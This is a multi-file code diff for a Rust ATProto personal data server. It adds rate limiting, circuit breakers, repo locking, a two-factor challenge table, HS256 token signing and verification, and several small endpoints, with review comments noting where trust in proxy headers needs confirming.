- Token storage: Storing only token JTIs in session_tokens table (defense in depth against DB breaches). Refresh token family tracking enables detection of token reuse attacks.
- Key encryption: User signing keys encrypted at rest using AES-256-GCM with keys derived via HKDF from KEY_ENCRYPTION_KEY environment variable.
## PDS-Level App Endpoints
These endpoints need to be implemented at the PDS level (not just proxied to appview).
@@ -178,22 +185,6 @@ These are implemented at PDS level to enable local-first reads (read-after-write
### Notification (`app.bsky.notification`)
- [x] Implement `app.bsky.notification.registerPush` (push notification registration, proxied).
## Deprecated Sync Endpoints (for compatibility)
- [ ] Implement `com.atproto.sync.getCheckout` (deprecated, still needed for compatibility).
- [ ] Implement `com.atproto.sync.getHead` (deprecated, still needed for compatibility).
## Misc HTTP Endpoints
- [ ] Implement `/robots.txt` endpoint.
## Record Schema Validation
- [ ] Handle this generically.
## Preference Storage
User preferences (for app.bsky.actor.getPreferences/putPreferences):
- [x] Create preferences table for storing user app preferences.
- [x] Implement `app.bsky.actor.getPreferences` handler (read from postgres, proxy fallback).
- [x] Implement `app.bsky.actor.putPreferences` handler (write to postgres).
## Infrastructure & Core Components
- [x] Sequencer (Event Log)
- [x] Implement a `Sequencer` (backed by `repo_seq` table).
@@ -206,32 +197,53 @@ User preferences (for app.bsky.actor.getPreferences/putPreferences):
- [x] Manage Repo Root in `repos` table.
- [x] Implement Atomic Repo Transactions.
- [x] Ensure `blocks` write, `repo_root` update, `records` index update, and `sequencer` event are committed in a single transaction.
- [ ] Implement concurrency control (row-level locking on `repos` table) to prevent concurrent writes to the same repo.
- [x] Implement concurrency control (row-level locking via FOR UPDATE).
- [ ] DID Cache
- [ ] Implement caching layer for DID resolution (Redis or in-memory).
- [ ] Handle cache invalidation/expiry.
- [ ] Background Jobs
- [ ] Implement `Crawlers` service (debounce notifications to relays).
- [x] Crawlers Service
- [x] Implement `Crawlers` service (debounce notifications to relays).
- [x] 20-minute notification debounce.
- [x] Circuit breaker for relay failures.
- [x] Notification Service
- [x] Queue-based notification system with database table
- [x] Background worker polling for pending notifications
- [x] Extensible sender trait for multiple channels
- [x] Email sender via OS sendmail/msmtp
- [ ] Discord bot sender
- [ ] Telegram bot sender
- [ ] Signal bot sender
- [x] Discord webhook sender
- [x] Telegram bot sender
- [x] Signal CLI sender
- [x] Helper functions for common notification types (welcome, password reset, email verification, etc.)
- [x] Respect user's `preferred_notification_channel` setting for non-email-specific notifications
- [ ] Image Processing
- [ ] Implement image resize/formatting pipeline (for blob uploads).
- [x] Image Processing
- [x] Implement image resize/formatting pipeline (for blob uploads).
- [x] WebP conversion for thumbnails.
- [x] EXIF stripping.
- [x] File size limits (10MB default).
- [x] IPLD & MST
- [x] Implement Merkle Search Tree logic for repo signing.
- [x] Implement CAR (Content Addressable Archive) encoding/decoding.
- [ ] Validation
- [ ] DID PLC operations: sign operations with rotation keys and validate incoming operations against them.
- [ ] Fix any remaining TODOs in the code, everywhere, full stop.
- [x] Cycle detection in CAR export.
- [x] Rate Limiting
- [x] Per-IP rate limiting on login (10/min).
- [x] Per-IP rate limiting on OAuth token endpoint (30/min).
- [x] Per-IP rate limiting on password reset (5/hour).
- [x] Per-IP rate limiting on account creation (10/hour).
- [x] Circuit Breakers
- [x] PLC directory circuit breaker (5 failures → open, 60s timeout).
- [x] Relay notification circuit breaker (10 failures → open, 30s timeout).
- [x] Security Hardening
- [x] Email header injection prevention (CRLF sanitization).
- [x] Signal command injection prevention (phone number validation).
- [x] Constant-time signature comparison.
- [x] SSRF protection for outbound requests.
## Web Management UI
## Lewis' fabulous mini-list of remaining TODOs
- [ ] DID resolution caching (valkey).
- [ ] Record schema validation (generic validation framework).
- [ ] Fix any remaining TODOs in the code.
## Future: Web Management UI
A single-page web app for account management. The frontend (JS framework) calls existing ATProto XRPC endpoints - no server-side rendering or bespoke HTML form handlers.
### Architecture

View File

@@ -0,0 +1,16 @@
-- Opt-in two-factor authentication flag for each account.
ALTER TABLE users ADD COLUMN two_factor_enabled BOOLEAN NOT NULL DEFAULT FALSE;
-- New notification type so 2FA codes can be delivered via the existing
-- queue-based notification system.
ALTER TYPE notification_type ADD VALUE 'two_factor_code';
-- One row per outstanding OAuth 2FA challenge: a code the user must present
-- before the OAuth request identified by request_uri may proceed.
CREATE TABLE oauth_2fa_challenge (
-- Surrogate id; gen_random_uuid() requires pgcrypto or PostgreSQL 13+.
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
-- Challenge owner; challenges disappear with the account.
did TEXT NOT NULL REFERENCES users(did) ON DELETE CASCADE,
-- OAuth request this challenge gates (looked up by the index below).
request_uri TEXT NOT NULL,
-- One-time verification code sent to the user.
code TEXT NOT NULL,
-- Failed verification attempts, for attempt-limiting.
attempts INTEGER NOT NULL DEFAULT 0,
created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
-- Short-lived by design: ten minutes from creation.
expires_at TIMESTAMPTZ NOT NULL DEFAULT NOW() + INTERVAL '10 minutes'
);
-- Lookup path during the OAuth flow.
CREATE INDEX idx_oauth_2fa_challenge_request_uri ON oauth_2fa_challenge(request_uri);
-- Supports purging expired challenges.
CREATE INDEX idx_oauth_2fa_challenge_expires ON oauth_2fa_challenge(expires_at);

View File

@@ -3,7 +3,7 @@ use crate::state::AppState;
use axum::{
Json,
extract::State,
http::StatusCode,
http::{HeaderMap, StatusCode},
response::{IntoResponse, Response},
};
use bcrypt::{DEFAULT_COST, hash};
@@ -16,6 +16,22 @@ use serde_json::json;
use std::sync::Arc;
use tracing::{error, info, warn};
/// Best-effort client IP extraction for rate limiting.
///
/// Checks `X-Forwarded-For` first, taking the left-most (original client)
/// entry of the comma-separated list, then `X-Real-IP`, and falls back to
/// the literal string "unknown".
///
/// NOTE(review): both headers are client-supplied unless a trusted reverse
/// proxy overwrites them, so a direct caller could spoof its IP and evade
/// per-IP limits — confirm the deployment always sits behind such a proxy.
fn extract_client_ip(headers: &HeaderMap) -> String {
    if let Some(forwarded) = headers.get("x-forwarded-for") {
        if let Ok(value) = forwarded.to_str() {
            // split(',').next() always yields at least one segment, so any
            // readable X-Forwarded-For value short-circuits here.
            if let Some(first_ip) = value.split(',').next() {
                return first_ip.trim().to_string();
            }
        }
    }
    if let Some(real_ip) = headers.get("x-real-ip") {
        if let Ok(value) = real_ip.to_str() {
            return value.trim().to_string();
        }
    }
    "unknown".to_string()
}
#[derive(Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct CreateAccountInput {
@@ -38,9 +54,24 @@ pub struct CreateAccountOutput {
pub async fn create_account(
State(state): State<AppState>,
headers: HeaderMap,
Json(input): Json<CreateAccountInput>,
) -> Response {
info!("create_account called");
let client_ip = extract_client_ip(&headers);
if state.rate_limiters.account_creation.check_key(&client_ip).is_err() {
warn!(ip = %client_ip, "Account creation rate limit exceeded");
return (
StatusCode::TOO_MANY_REQUESTS,
Json(json!({
"error": "RateLimitExceeded",
"message": "Too many account creation attempts. Please try again later."
})),
)
.into_response();
}
if input.handle.contains('!') || input.handle.contains('@') {
return (
StatusCode::BAD_REQUEST,
@@ -184,8 +215,40 @@ pub async fn create_account(
let user_id = match user_insert {
Ok(row) => row.id,
Err(e) => {
if let Some(db_err) = e.as_database_error() {
if db_err.code().as_deref() == Some("23505") {
let constraint = db_err.constraint().unwrap_or("");
if constraint.contains("handle") || constraint.contains("users_handle") {
return (
StatusCode::BAD_REQUEST,
Json(json!({
"error": "HandleNotAvailable",
"message": "Handle already taken"
})),
)
.into_response();
} else if constraint.contains("email") || constraint.contains("users_email") {
return (
StatusCode::BAD_REQUEST,
Json(json!({
"error": "InvalidEmail",
"message": "Email already registered"
})),
)
.into_response();
} else if constraint.contains("did") || constraint.contains("users_did") {
return (
StatusCode::BAD_REQUEST,
Json(json!({
"error": "AccountAlreadyExists",
"message": "An account with this DID already exists"
})),
)
.into_response();
}
}
}
error!("Error inserting user: {:?}", e);
// TODO: Check for unique constraint violation on email/did specifically
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError"})),

View File

@@ -1,6 +1,7 @@
use crate::api::ApiError;
use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError};
use crate::plc::{
create_update_op, sign_operation, PlcClient, PlcError, PlcService,
create_update_op, sign_operation, PlcClient, PlcError, PlcOpOrTombstone, PlcService,
};
use crate::state::AppState;
use axum::{
@@ -14,7 +15,7 @@ use k256::ecdsa::SigningKey;
use serde::{Deserialize, Serialize};
use serde_json::{json, Value};
use std::collections::HashMap;
use tracing::{error, info};
use tracing::{error, info, warn};
#[derive(Debug, Deserialize)]
#[serde(rename_all = "camelCase")]
@@ -166,9 +167,27 @@ pub async fn sign_plc_operation(
};
let plc_client = PlcClient::new(None);
let last_op = match plc_client.get_last_op(did).await {
let did_clone = did.clone();
let result: Result<PlcOpOrTombstone, CircuitBreakerError<PlcError>> = with_circuit_breaker(
&state.circuit_breakers.plc_directory,
|| async { plc_client.get_last_op(&did_clone).await },
)
.await;
let last_op = match result {
Ok(op) => op,
Err(PlcError::NotFound) => {
Err(CircuitBreakerError::CircuitOpen(e)) => {
warn!("PLC directory circuit breaker open: {}", e);
return (
StatusCode::SERVICE_UNAVAILABLE,
Json(json!({
"error": "ServiceUnavailable",
"message": "PLC directory service temporarily unavailable"
})),
)
.into_response();
}
Err(CircuitBreakerError::OperationFailed(PlcError::NotFound)) => {
return (
StatusCode::NOT_FOUND,
Json(json!({
@@ -178,7 +197,7 @@ pub async fn sign_plc_operation(
)
.into_response();
}
Err(e) => {
Err(CircuitBreakerError::OperationFailed(e)) => {
error!("Failed to fetch PLC operation: {:?}", e);
return (
StatusCode::BAD_GATEWAY,

View File

@@ -1,5 +1,6 @@
use crate::api::ApiError;
use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient};
use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError};
use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient, PlcError};
use crate::state::AppState;
use axum::{
extract::State,
@@ -183,16 +184,38 @@ pub async fn submit_plc_operation(
}
let plc_client = PlcClient::new(None);
if let Err(e) = plc_client.send_operation(did, &input.operation).await {
error!("Failed to submit PLC operation: {:?}", e);
return (
StatusCode::BAD_GATEWAY,
Json(json!({
"error": "UpstreamError",
"message": format!("Failed to submit to PLC directory: {}", e)
})),
)
.into_response();
let operation_clone = input.operation.clone();
let did_clone = did.clone();
let result: Result<(), CircuitBreakerError<PlcError>> = with_circuit_breaker(
&state.circuit_breakers.plc_directory,
|| async { plc_client.send_operation(&did_clone, &operation_clone).await },
)
.await;
match result {
Ok(()) => {}
Err(CircuitBreakerError::CircuitOpen(e)) => {
warn!("PLC directory circuit breaker open: {}", e);
return (
StatusCode::SERVICE_UNAVAILABLE,
Json(json!({
"error": "ServiceUnavailable",
"message": "PLC directory service temporarily unavailable"
})),
)
.into_response();
}
Err(CircuitBreakerError::OperationFailed(e)) => {
error!("Failed to submit PLC operation: {:?}", e);
return (
StatusCode::BAD_GATEWAY,
Json(json!({
"error": "UpstreamError",
"message": format!("Failed to submit to PLC directory: {}", e)
})),
)
.into_response();
}
}
if let Err(e) = sqlx::query!(

View File

@@ -10,6 +10,7 @@ pub mod proxy_client;
pub mod read_after_write;
pub mod repo;
pub mod server;
pub mod temp;
pub mod validation;
pub use error::ApiError;

View File

@@ -167,57 +167,57 @@ pub async fn list_records(
let limit = input.limit.unwrap_or(50).clamp(1, 100);
let reverse = input.reverse.unwrap_or(false);
// Simplistic query construction - no sophisticated cursor handling or rkey ranges for now, just basic pagination
// TODO: Implement rkeyStart/End and correct cursor logic
let limit_i64 = limit as i64;
let rows_res = if let Some(cursor) = &input.cursor {
if reverse {
sqlx::query!(
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey < $3 ORDER BY rkey DESC LIMIT $4",
user_id,
input.collection,
cursor,
limit_i64
)
let order = if reverse { "ASC" } else { "DESC" };
let rows_res: Result<Vec<(String, String)>, sqlx::Error> = if let Some(cursor) = &input.cursor {
let comparator = if reverse { ">" } else { "<" };
let query = format!(
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey {} $3 ORDER BY rkey {} LIMIT $4",
comparator, order
);
sqlx::query_as(&query)
.bind(user_id)
.bind(&input.collection)
.bind(cursor)
.bind(limit_i64)
.fetch_all(&state.db)
.await
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
} else {
sqlx::query!(
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey > $3 ORDER BY rkey ASC LIMIT $4",
user_id,
input.collection,
cursor,
limit_i64
)
.fetch_all(&state.db)
.await
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
}
} else {
if reverse {
sqlx::query!(
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey DESC LIMIT $3",
user_id,
input.collection,
limit_i64
)
.fetch_all(&state.db)
.await
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
} else {
sqlx::query!(
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey ASC LIMIT $3",
user_id,
input.collection,
limit_i64
)
.fetch_all(&state.db)
.await
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
let mut conditions = vec!["repo_id = $1", "collection = $2"];
let mut param_idx = 3;
if input.rkey_start.is_some() {
conditions.push("rkey > $3");
param_idx += 1;
}
if input.rkey_end.is_some() {
conditions.push(if param_idx == 3 { "rkey < $3" } else { "rkey < $4" });
param_idx += 1;
}
let limit_idx = param_idx;
let query = format!(
"SELECT rkey, record_cid FROM records WHERE {} ORDER BY rkey {} LIMIT ${}",
conditions.join(" AND "),
order,
limit_idx
);
let mut query_builder = sqlx::query_as::<_, (String, String)>(&query)
.bind(user_id)
.bind(&input.collection);
if let Some(start) = &input.rkey_start {
query_builder = query_builder.bind(start);
}
if let Some(end) = &input.rkey_end {
query_builder = query_builder.bind(end);
}
query_builder.bind(limit_i64).fetch_all(&state.db).await
};
let rows = match rows_res {

View File

@@ -58,6 +58,34 @@ pub async fn commit_and_log(
let mut tx = state.db.begin().await
.map_err(|e| format!("Failed to begin transaction: {}", e))?;
let lock_result = sqlx::query!(
"SELECT repo_root_cid FROM repos WHERE user_id = $1 FOR UPDATE NOWAIT",
user_id
)
.fetch_optional(&mut *tx)
.await;
match lock_result {
Err(e) => {
if let Some(db_err) = e.as_database_error() {
if db_err.code().as_deref() == Some("55P03") {
return Err("ConcurrentModification: Another request is modifying this repo".to_string());
}
}
return Err(format!("Failed to acquire repo lock: {}", e));
}
Ok(Some(row)) => {
if let Some(expected_root) = &current_root_cid {
if row.repo_root_cid != expected_root.to_string() {
return Err("ConcurrentModification: Repo has been modified since last read".to_string());
}
}
}
Ok(None) => {
return Err("Repo not found".to_string());
}
}
sqlx::query!("UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2", new_root_cid.to_string(), user_id)
.execute(&mut *tx)
.await

View File

@@ -4,6 +4,14 @@ use serde_json::json;
use tracing::error;
/// Serve a permissive `/robots.txt` that allows all crawlers on every path.
pub async fn robots_txt() -> impl IntoResponse {
    const BODY: &str =
        "# Hello!\n\n# Crawling the public API is allowed\nUser-agent: *\nAllow: /\n";
    let headers = [("content-type", "text/plain")];
    (StatusCode::OK, headers, BODY)
}
pub async fn describe_server() -> impl IntoResponse {
let domains_str =
std::env::var("AVAILABLE_USER_DOMAINS").unwrap_or_else(|_| "example.com".to_string());

View File

@@ -15,7 +15,7 @@ pub use account_status::{
pub use app_password::{create_app_password, list_app_passwords, revoke_app_password};
pub use email::{confirm_email, request_email_update, update_email};
pub use invite::{create_invite_code, create_invite_codes, get_account_invite_codes};
pub use meta::{describe_server, health};
pub use meta::{describe_server, health, robots_txt};
pub use password::{request_password_reset, reset_password};
pub use service_auth::get_service_auth;
pub use session::{create_session, delete_session, get_session, refresh_session};

View File

@@ -2,7 +2,7 @@ use crate::state::AppState;
use axum::{
Json,
extract::State,
http::StatusCode,
http::{HeaderMap, StatusCode},
response::{IntoResponse, Response},
};
use bcrypt::{hash, DEFAULT_COST};
@@ -15,6 +15,22 @@ fn generate_reset_code() -> String {
crate::util::generate_token_code()
}
/// Derive the client's IP address from proxy headers for rate limiting.
///
/// Prefers the first (left-most) entry of `X-Forwarded-For`, then
/// `X-Real-IP`; returns "unknown" when neither header is readable.
fn extract_client_ip(headers: &HeaderMap) -> String {
    let forwarded_ip = headers
        .get("x-forwarded-for")
        .and_then(|value| value.to_str().ok())
        .and_then(|value| value.split(',').next())
        .map(|ip| ip.trim().to_string());
    if let Some(ip) = forwarded_ip {
        return ip;
    }
    headers
        .get("x-real-ip")
        .and_then(|value| value.to_str().ok())
        .map(|value| value.trim().to_string())
        .unwrap_or_else(|| "unknown".to_string())
}
#[derive(Deserialize)]
pub struct RequestPasswordResetInput {
pub email: String,
@@ -22,8 +38,22 @@ pub struct RequestPasswordResetInput {
pub async fn request_password_reset(
State(state): State<AppState>,
headers: HeaderMap,
Json(input): Json<RequestPasswordResetInput>,
) -> Response {
let client_ip = extract_client_ip(&headers);
if state.rate_limiters.password_reset.check_key(&client_ip).is_err() {
warn!(ip = %client_ip, "Password reset rate limit exceeded");
return (
StatusCode::TOO_MANY_REQUESTS,
Json(json!({
"error": "RateLimitExceeded",
"message": "Too many password reset requests. Please try again later."
})),
)
.into_response();
}
let email = input.email.trim().to_lowercase();
if email.is_empty() {
return (

View File

@@ -4,6 +4,7 @@ use crate::state::AppState;
use axum::{
Json,
extract::State,
http::{HeaderMap, StatusCode},
response::{IntoResponse, Response},
};
use bcrypt::verify;
@@ -11,6 +12,22 @@ use serde::{Deserialize, Serialize};
use serde_json::json;
use tracing::{error, info, warn};
/// Resolve the caller's IP for per-IP login rate limiting.
///
/// Order of precedence: first entry of `X-Forwarded-For`, then `X-Real-IP`,
/// then the sentinel "unknown".
///
/// NOTE(review): these headers can be forged by direct (non-proxied)
/// clients; verify a trusted proxy sets them in production.
fn extract_client_ip(headers: &HeaderMap) -> String {
    if let Some(forwarded) = headers.get("x-forwarded-for") {
        if let Ok(value) = forwarded.to_str() {
            if let Some(first_ip) = value.split(',').next() {
                return first_ip.trim().to_string();
            }
        }
    }
    if let Some(real_ip) = headers.get("x-real-ip") {
        if let Ok(value) = real_ip.to_str() {
            return value.trim().to_string();
        }
    }
    "unknown".to_string()
}
#[derive(Deserialize)]
pub struct CreateSessionInput {
pub identifier: String,
@@ -28,10 +45,24 @@ pub struct CreateSessionOutput {
pub async fn create_session(
State(state): State<AppState>,
headers: HeaderMap,
Json(input): Json<CreateSessionInput>,
) -> Response {
info!("create_session called");
let client_ip = extract_client_ip(&headers);
if state.rate_limiters.login.check_key(&client_ip).is_err() {
warn!(ip = %client_ip, "Login rate limit exceeded");
return (
StatusCode::TOO_MANY_REQUESTS,
Json(json!({
"error": "RateLimitExceeded",
"message": "Too many login attempts. Please try again later."
})),
)
.into_response();
}
let row = match sqlx::query!(
"SELECT u.id, u.did, u.handle, u.password_hash, k.key_bytes, k.encryption_version FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.handle = $1 OR u.email = $1",
input.identifier

48
src/api/temp.rs Normal file
View File

@@ -0,0 +1,48 @@
use axum::{
Json,
extract::State,
http::{HeaderMap, StatusCode},
response::{IntoResponse, Response},
};
use serde::Serialize;
use serde_json::json;
use crate::auth::{extract_bearer_token_from_header, validate_bearer_token};
use crate::state::AppState;
/// Response body for the `com.atproto.temp.checkSignupQueue` endpoint.
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct CheckSignupQueueOutput {
    // Whether the account is activated; the handler in this file always
    // reports true since this PDS has no signup queue.
    pub activated: bool,
    // Queue position; omitted from the JSON when None.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub place_in_queue: Option<i64>,
    // Estimated wait in milliseconds; omitted from the JSON when None.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub estimated_time_ms: Option<i64>,
}
/// Handler for `com.atproto.temp.checkSignupQueue`.
///
/// This PDS has no signup queue, so every caller is reported as already
/// activated. The one rejection is OAuth-scoped credentials, which are not
/// accepted on this endpoint; an invalid or absent bearer token falls
/// through to the success response.
pub async fn check_signup_queue(
    State(state): State<AppState>,
    headers: HeaderMap,
) -> Response {
    let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
    if let Some(token) = extract_bearer_token_from_header(auth_header) {
        if let Ok(user) = validate_bearer_token(&state.db, &token).await {
            if user.is_oauth {
                let body = json!({
                    "error": "Forbidden",
                    "message": "OAuth credentials are not supported for this endpoint"
                });
                return (StatusCode::FORBIDDEN, Json(body)).into_response();
            }
        }
    }
    let output = CheckSignupQueueOutput {
        activated: true,
        place_in_queue: None,
        estimated_time_ms: None,
    };
    Json(output).into_response()
}

View File

@@ -3,9 +3,13 @@ use anyhow::Result;
use base64::Engine as _;
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
use chrono::{DateTime, Duration, Utc};
use hmac::{Hmac, Mac};
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
use sha2::Sha256;
use uuid;
type HmacSha256 = Hmac<Sha256>;
pub const TOKEN_TYPE_ACCESS: &str = "at+jwt";
pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt";
pub const TOKEN_TYPE_SERVICE: &str = "jwt";
@@ -118,3 +122,97 @@ fn sign_claims_with_type(claims: Claims, key: &SigningKey, typ: &str) -> Result<
Ok(format!("{}.{}", message, signature_b64))
}
/// Mint an HS256 access token for `did`, discarding the JTI/expiry metadata.
pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
    create_access_token_hs256_with_metadata(did, secret).map(|minted| minted.token)
}
/// Mint an HS256 refresh token for `did`, discarding the JTI/expiry metadata.
pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
    create_refresh_token_hs256_with_metadata(did, secret).map(|minted| minted.token)
}
/// Mint an HS256 access token (120-minute lifetime, `typ` = "at+jwt") and
/// return it with its JTI and expiry so the caller can persist the JTI.
pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
    create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120))
}
/// Mint an HS256 refresh token (90-day lifetime, `typ` = "refresh+jwt") and
/// return it with its JTI and expiry so the caller can persist the JTI.
pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
    create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90))
}
/// Mint a short-lived (60-second) HS256 inter-service token.
///
/// `iss` and `sub` are both the acting `did`; `aud` names the receiving
/// service and `lxm` pins the token to a single XRPC method.
///
/// # Errors
/// Returns an error if claim serialization or HMAC keying fails.
pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> {
    // Sample the clock once so `iat` and `exp` are derived from the same
    // instant (previously two Utc::now() calls could straddle a second
    // boundary and skew the effective lifetime).
    let now = Utc::now();
    let expiration = now
        .checked_add_signed(Duration::seconds(60))
        .expect("valid timestamp")
        .timestamp();
    let claims = Claims {
        iss: did.to_owned(),
        sub: did.to_owned(),
        aud: aud.to_owned(),
        exp: expiration as usize,
        iat: now.timestamp() as usize,
        scope: None,
        lxm: Some(lxm.to_string()),
        // Unique token id; enables replay tracking on the receiving side.
        jti: uuid::Uuid::new_v4().to_string(),
    };
    sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret)
}
/// Build an HS256 JWT with the given `scope`, header `typ`, and lifetime
/// `duration`, returning the token together with its JTI and expiry
/// timestamp so the caller can persist the JTI (e.g. in session_tokens).
fn create_hs256_token_with_metadata(
    did: &str,
    scope: &str,
    typ: &str,
    secret: &[u8],
    duration: Duration,
) -> Result<TokenWithMetadata> {
    // Sample the clock once so `iat` and `expires_at` are computed from the
    // same instant (two separate Utc::now() calls could disagree by a
    // second).
    let now = Utc::now();
    let expires_at = now.checked_add_signed(duration).expect("valid timestamp");
    let jti = uuid::Uuid::new_v4().to_string();
    let claims = Claims {
        iss: did.to_owned(),
        sub: did.to_owned(),
        // NOTE(review): PDS_HOSTNAME may include a port ("localhost:3000");
        // did:web encodes ':' as %3A — confirm downstream verifiers accept
        // the form produced here.
        aud: format!(
            "did:web:{}",
            std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())
        ),
        exp: expires_at.timestamp() as usize,
        iat: now.timestamp() as usize,
        scope: Some(scope.to_string()),
        lxm: None,
        jti: jti.clone(),
    };
    let token = sign_claims_hs256(claims, typ, secret)?;
    Ok(TokenWithMetadata {
        token,
        jti,
        expires_at,
    })
}
/// Serialize and sign a JWT as `base64url(header).base64url(claims).base64url(mac)`
/// using HMAC-SHA256 over the first two segments.
fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> {
    let header = Header {
        alg: "HS256".to_string(),
        typ: typ.to_string(),
    };
    let encoded_header = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header)?);
    let encoded_claims = URL_SAFE_NO_PAD.encode(serde_json::to_string(&claims)?);
    let signing_input = format!("{}.{}", encoded_header, encoded_claims);
    let mut mac = HmacSha256::new_from_slice(secret)
        .map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?;
    mac.update(signing_input.as_bytes());
    let tag = URL_SAFE_NO_PAD.encode(mac.finalize().into_bytes());
    Ok(format!("{}.{}", signing_input, tag))
}

View File

@@ -4,7 +4,12 @@ use anyhow::{Context, Result, anyhow};
use base64::Engine as _;
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
use chrono::Utc;
use hmac::{Hmac, Mac};
use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier};
use sha2::Sha256;
use subtle::ConstantTimeEq;
type HmacSha256 = Hmac<Sha256>;
pub fn get_did_from_token(token: &str) -> Result<String, String> {
let parts: Vec<&str> = token.split('.').collect();
@@ -63,6 +68,24 @@ pub fn verify_refresh_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<C
)
}
/// Verify an HS256 access token: signature, expiry, header `typ` ==
/// "at+jwt", and a scope from the access allow-list.
pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
    verify_token_hs256_internal(
        token,
        secret,
        Some(TOKEN_TYPE_ACCESS),
        // Full-access plus both app-password scope variants are accepted.
        Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
    )
}
/// Verify an HS256 refresh token: signature, expiry, header `typ` ==
/// "refresh+jwt", and the refresh scope only.
pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
    verify_token_hs256_internal(
        token,
        secret,
        Some(TOKEN_TYPE_REFRESH),
        Some(&[SCOPE_REFRESH]),
    )
}
fn verify_token_internal(
token: &str,
key_bytes: &[u8],
@@ -124,3 +147,86 @@ fn verify_token_internal(
Ok(TokenData { claims })
}
/// Shared HS256 JWT verification.
///
/// Order matters for safety: the signature is checked (in constant time)
/// BEFORE the claims are deserialized, so untrusted claim bytes are never
/// parsed. Then expiry, optional expected header `typ`, and an optional
/// scope allow-list are enforced.
fn verify_token_hs256_internal(
    token: &str,
    secret: &[u8],
    expected_typ: Option<&str>,
    allowed_scopes: Option<&[&str]>,
) -> Result<TokenData<Claims>> {
    // A compact JWT is exactly three dot-separated base64url segments.
    let parts: Vec<&str> = token.split('.').collect();
    if parts.len() != 3 {
        return Err(anyhow!("Invalid token format"));
    }
    let header_b64 = parts[0];
    let claims_b64 = parts[1];
    let signature_b64 = parts[2];
    let header_bytes = URL_SAFE_NO_PAD
        .decode(header_b64)
        .context("Base64 decode of header failed")?;
    let header: Header =
        serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
    // Reject algorithm confusion: this path only accepts HS256.
    if header.alg != "HS256" {
        return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg));
    }
    if let Some(expected) = expected_typ {
        if header.typ != expected {
            return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
        }
    }
    let signature_bytes = URL_SAFE_NO_PAD
        .decode(signature_b64)
        .context("Base64 decode of signature failed")?;
    // Recompute the MAC over the exact signing input (header "." claims).
    let message = format!("{}.{}", header_b64, claims_b64);
    let mut mac = HmacSha256::new_from_slice(secret)
        .map_err(|e| anyhow!("Invalid secret: {}", e))?;
    mac.update(message.as_bytes());
    let expected_signature = mac.finalize().into_bytes();
    // Constant-time comparison avoids timing side channels on the MAC.
    let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into();
    if !is_valid {
        return Err(anyhow!("Signature verification failed"));
    }
    // Only now that the signature is trusted do we parse the claims JSON.
    let claims_bytes = URL_SAFE_NO_PAD
        .decode(claims_b64)
        .context("Base64 decode of claims failed")?;
    let claims: Claims =
        serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
    let now = Utc::now().timestamp() as usize;
    // NOTE(review): `exp < now` accepts a token at the exact expiry second;
    // RFC 7519 requires the current time to be strictly before `exp` —
    // confirm this one-second grace is intended.
    if claims.exp < now {
        return Err(anyhow!("Token expired"));
    }
    if let Some(scopes) = allowed_scopes {
        // A missing scope claim is treated as "" and fails the allow-list.
        let token_scope = claims.scope.as_deref().unwrap_or("");
        if !scopes.contains(&token_scope) {
            return Err(anyhow!("Invalid token scope: {}", token_scope));
        }
    }
    Ok(TokenData { claims })
}
/// Peek at a JWT's header and report its `alg` field WITHOUT verifying the
/// token — use only to route a token to the right verification path.
